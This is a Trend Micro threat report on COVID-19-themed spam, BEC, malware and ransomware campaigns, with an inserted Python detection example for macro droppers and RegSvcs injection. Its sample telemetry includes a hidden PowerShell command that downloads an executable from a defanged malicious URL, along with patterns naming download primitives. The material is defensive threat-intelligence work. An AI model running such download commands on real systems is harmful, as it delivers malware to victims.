
Developing Story: Coronavirus Used in Malicious Campaigns

Updated on March 16, 2020. Originally published on March 06, 2020. Former title: Coronavirus Used in Spam, Malware File Names, and Malicious Domains

The coronavirus disease (COVID-19) is being used in a variety of malicious campaigns, including email spam, BEC, malware, ransomware, and malicious domains. As the number of those afflicted continues to surge by the thousands, campaigns that use the disease as a lure increase likewise. Trend Micro researchers are periodically sourcing samples from coronavirus-related malicious campaigns. This report also includes detections from other researchers.

Using current events as a lure is nothing new for threat actors, who time and again exploit the timeliness of hot topics, occasions, and popular personalities in their social engineering strategies.

[Related: Emotet Uses Coronavirus Scare in Latest Campaign, Targets Japan]
 

Spam

Trend Micro researchers acquired email samples sent to and received from all over the globe, including countries such as the U.S., Japan, Russia, and China. Many of the emails, purportedly from official organizations, contain updates and recommendations connected to the disease. Like most email spam attacks, they also include malicious attachments.

One of the samples used the email subject “Corona Virus Latest Updates” and claimed to come from the Ministry of Health. It contained recommendations on how to prevent infection and came with an attachment that supposedly contained the latest updates on COVID-19 but actually carried malware.


Figure 1. COVID-19 related email spam purportedly from the Ministry of Health
 

Many of the spam emails were related to shipping transactions, either a postponement due to the spread of the disease or a shipping update. One email announced a shipping postponement; its attachment, supposedly containing the details of the new shipping schedule, carried malware. The email is assumed to come from Japan and included details written in Japanese (masked in the screenshot).


Figure 2. COVID-19 related email spam about a shipping postponement
 

Other samples were detected in languages such as Italian and Portuguese. The Italian email claimed to carry important information about the virus, while the Portuguese email discussed a supposed vaccine for COVID-19.


Figure 3. COVID-19 related email spam in Italian


Figure 4. COVID-19 related email spam in Portuguese

 

Malware Files

Trend Micro researchers also detected malware with “corona virus” in the file name, listed below:

[Table: malware file names containing “corona virus”]

Other researchers are seeing cybercriminals take advantage of coronavirus maps and dashboards. Researchers from Reason Labs have found fake websites that lead to the download and installation of malware. The downloaded malware is detected by Trend Micro as the following:

[Table: Trend Micro detection names for the malware downloaded from the fake map sites]

Domains

A notable increase in domain names using the word “corona” has also been observed by Bit Discovery. Trend Micro researchers confirmed a number of such domains as malicious.


 

Updates as of March 16, 2020

Email Spam

Trend Micro researchers encountered an email spam sample targeting China and Italy that mentioned a cure for coronavirus in the email subject as a lure for downloading the malicious attachment. Further inspection revealed that the payload delivered by the attachment is HawkEye Reborn, a newer variant of the information-stealing HawkEye trojan. The file is a heavily obfuscated AutoIt script compiled into an executable. The script then injects malicious code into RegSvcs.exe. Dumping the injected code yields a .NET executable that is also packed with ConfuserEx. Part of the decrypted configuration of the HawkEye sample includes the email address and mail server to which it sends its exfiltrated data.


Figure 5. HawkEye Reborn coronavirus email spam

Indicators of Compromise

[Table: indicators of compromise for the HawkEye Reborn sample]

Other samples of email spam targeting Italy were also detected by Trend Micro researchers. This time, the disease was mentioned not in the email subject but in the URL. The subject instead contained the word “Fattura” (Italian for “invoice”), an invoice number, and its supposed date. The emails carried attachments containing malware that executes a PowerShell command to download a file from a COVID-19-themed URL, hxxps://recoverrryasitalycovid-19.xyz/over.

Upon further investigation, it was found that the malware used Evil Clippy, a tool for creating malicious MS Office documents, to hide its macro.
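The two execution chains described above (the HawkEye Reborn sample injecting into RegSvcs.exe, and the Italian invoice spam whose attachment runs a PowerShell download) can both be caught from process-creation telemetry. The following is an added detection example, not Trend Micro's code: the events are constructed Sysmon-style records with invented paths (corona_cure.exe stands in for the AutoIt-compiled dropper, which is assumed to launch RegSvcs.exe itself, the usual hollowing pattern), and only the defanged URL comes from the report.

```python
import re

# Constructed Sysmon-style (Event ID 1) process-creation records; not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\corona_cure.exe"},   # injection host
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c (New-Object Net.WebClient)"
                    ".DownloadFile('hxxps://recoverrryasitalycovid-19.xyz/over','a.exe')",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},  # macro
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'RegSvcs.exe "C:\Program Files\Vendor\svc.dll"',
     "ParentImage": r"C:\Program Files\Vendor\setup.exe"},                    # legitimate use
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1",
     "ParentImage": r"C:\Windows\explorer.exe"},                              # benign
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|public)\\", re.I)
DOWNLOAD_PRIMITIVE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer|net\.webclient", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def has_no_arguments(ev):
    # Command line is just the image path (quoted or bare): a real RegSvcs run names an assembly.
    cmd = ev["CommandLine"].strip().strip('"').lower()
    return cmd in (ev["Image"].lower(), basename(ev["Image"]))

def regsvcs_injection_host(ev):
    """RegSvcs.exe started with nothing to register, or by a parent in a user-writable path."""
    if basename(ev["Image"]) != "regsvcs.exe":
        return False
    return has_no_arguments(ev) or USER_WRITABLE.search(ev["ParentImage"]) is not None

def office_powershell_download(ev):
    """An Office application spawning PowerShell that pulls a remote file (macro dropper)."""
    return (basename(ev["Image"]) in ("powershell.exe", "pwsh.exe")
            and basename(ev["ParentImage"]) in OFFICE_APPS
            and DOWNLOAD_PRIMITIVE.search(ev["CommandLine"]) is not None)

RULES = (regsvcs_injection_host, office_powershell_download)

def scan(events):
    """Return (rule name, parent image) for every event that a rule matches."""
    return [(rule.__name__, ev["ParentImage"]) for ev in events for rule in RULES if rule(ev)]
```

Running scan(SAMPLE_EVENTS) flags only the first two records; the vendor installer registering an assembly and the scheduled backup script pass unflagged.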


Figure 6. Italian email spam connected to a URL related to COVID-19

Trend Micro detections for these are the following:

[Table: Trend Micro detection names for the Italian invoice spam samples]

BEC

A Business Email Compromise (BEC) attack mentioning coronavirus was reported by Agari Cyber Intelligence Division (ACID). The attack, a continuation of an earlier BEC campaign, came from Ancient Tortoise, a cybercrime group behind multiple BEC cases in the past.

The threat actors first trick accounts receivable staff into forwarding aging reports (accounts receivable reports). Then, posing as the legitimate companies, they use the customer information in these reports to email customers about a change in banks and payment methods due to COVID-19.

Malware

An interactive coronavirus map was used to spread information-stealing malware, as revealed by Brian Krebs. The map, which was created by Johns Hopkins University, is an interactive dashboard showing coronavirus infections and deaths. Several members of Russian underground forums took advantage of this and sold a digital Coronavirus infection kit that deploys Java-based malware. Victims are lured to open the map and even share it.

Ransomware

A new ransomware variant called CoronaVirus was spread through a fake Wise Cleaner site, a website that supposedly promoted system optimization, as reported by MalwareHunterTeam. Victims unknowingly download the file WSGSetup.exe from the fake site. The file acts as a downloader for two types of malware: the CoronaVirus ransomware and a password-stealing trojan named Kpot. This campaign follows the trend of recent ransomware attacks that go beyond encrypting data and steal information as well.

Another attack, presumed to have been caused by ransomware, hit University Hospital Brno in the Czech Republic, a COVID-19 testing center. The hospital’s computer systems were shut down because of the attack, delaying the release of COVID-19 test results.

A mobile ransomware named CovidLock comes from a malicious Android app that supposedly helps track cases of COVID-19. The ransomware locks the phones of victims, who are given 48 hours to pay US$100 in bitcoin to regain access to their phone. Threats include the deletion of data stored in the phone and the leak of social media account details.

Defense against these threats

Trend Micro endpoint solutions such as the Smart Protection Suites and Worry-Free™ Business Security detect and block the malware and the malicious domains it connects to.

As an added layer of defense, Trend Micro™ Email Security thwarts spam and other email attacks. The protection it provides is constantly updated, ensuring that the system is safeguarded from both old and new attacks involving spam, BEC, and ransomware. Trend Micro™ InterScan™ Messaging Security provides comprehensive protection that stops inbound threats and secures outbound data. It blocks spam and other email threats.

Multilayered protection is also recommended for covering all fronts and preventing users from accessing malicious domains that could deliver malware.

Source: Trend Micro
